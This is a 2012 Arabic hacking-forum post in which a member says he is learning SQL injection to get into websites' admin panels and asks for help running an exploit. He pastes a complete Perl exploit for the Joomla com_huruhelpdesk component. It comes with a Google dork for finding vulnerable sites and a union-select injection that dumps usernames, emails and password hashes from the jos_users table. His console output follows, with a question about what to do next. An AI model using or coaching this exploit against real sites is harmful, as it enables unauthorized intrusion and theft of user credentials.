التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب
تحديث الصفحة [مشكلة] وصلت لمرحلة اليأس
التعليمات التقويم مشاركات اليوم البحث

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
السابق المشاركة السابقة   المشاركة التالية التالي
قديم 11-26-2012, 07:00 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية Qroy hacker
 

 
 
إحصائية العضو





Qroy hacker غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Qroy hacker is on a distinguished road
Post غير مجاب: وصلت لمرحلة اليأس

سلام عليكم ورحمة الله وبركاتة ..
كيف الحال ان شاء الله بخير

وصلت لمرحلة اليأس

بصراحة بديت بتعلم حقن قواعد بيانات sql
وتعلمت عليها جيداً
لكن دائماً تجيني مشاكل بها ، وهي عدم وجود لوحه تحكم بعض المواقع أحياناً يجي اخطاء غريبة
لاعرف لها حل
مثل ، لايطلع الجدول المطلوب
والخ من المشاكل

قلت بشوف ثغرات سكربت جملا ، والورد بريس
بس للاسف ماعرفت لها ..
حاولت اترجم مافهمت كيف استغل

مثلا هاذي الثغرة

كود PHP:
#Exploit Title: Joomla Component com_huruhelpdesk Remote SQL Injection  #Google Dork: "inurl:option=com_huruhelpdesk"#Date: 04/10/2012#Exploit Author: D35m0nd142#Vendor Homepage: http://www.huruhelpdesk.net/#Tested on Joomla 1.5 #CVE: 2010-2907  #!/usr/bin/perlsystem("clear");print "***************************************\n";print " Joomla Component com_huruhelpdesk    *\n";print "      SQL Injection exploit           *\n";print "      Created by D35m0nd142           *\n";print "***************************************\n\n";use LWP::UserAgent;print "Target page [ex: http://www.site.com/dir] --> ";chomp(my $target=<STDIN> );$column_name="concat(username,0x3a,password,0x3a,mail)";$table_name="jos_users";$prm="-1/**/union/**/select/**/";$start= LWP::UserAgent->new() or die "[!] Error while processing";$start->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.12011');$website=  $target .  "/index.php?option=com_huruhelpdesk&view=detail&cid[0]=".$prm."1,2,3,".$column_name.",5,6,7+from+jos_users--";$ok= $start->request(HTTP::Request->new(GET=>$website));$ok1= $ok->content; if ($ok1 =~/([0-9a-fA-F]{32})/){print "[+] Password found --> $1\n\n";sleep 1;}else{print "No password found :(\n";}   # 1337day.com [2012-11-26] 
الي فهمته منها ادخل على الدوس
واكتب
cd..
cd..
نتحول لقرص الـc
من ثم
cd perl
وننتقل لـperl
ومن ثم cd bin
ومن ثم اروح للي حفظته بمجلد bin
وكمثال سميته kk.pl
اكتب kk.pl
يجي هكذا

كود PHP:
C:\Perl\bin>ksa.pl
'clear' is not recognized as an internal or external command,
operable program or batch file.
***************************************
 Joomla Component com_huruhelpdesk    *
      SQL Injection exploit           *
      Created by D35m0nd142           *
***************************************

Target page [exhttp://www.site.com/dir] --> 
الآن ماذا افعل ،

طفشت بصراحة ولا مرة سويت شي صح

حتى الثغرات مافهم لها

Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC ,wgj glvpgm hgdHs

التوقيع

 

   

رد مع اقتباس
 

مواقع النشر (المفضلة)

« الموضوع السابق | الموضوع التالي »

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة
الانتقال السريع


الساعة الآن 05:21 PM

:: vBspiders.Com :: RSS Feeds - راسلـنا - :: vBspiders.Com :: - الأعلى

[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0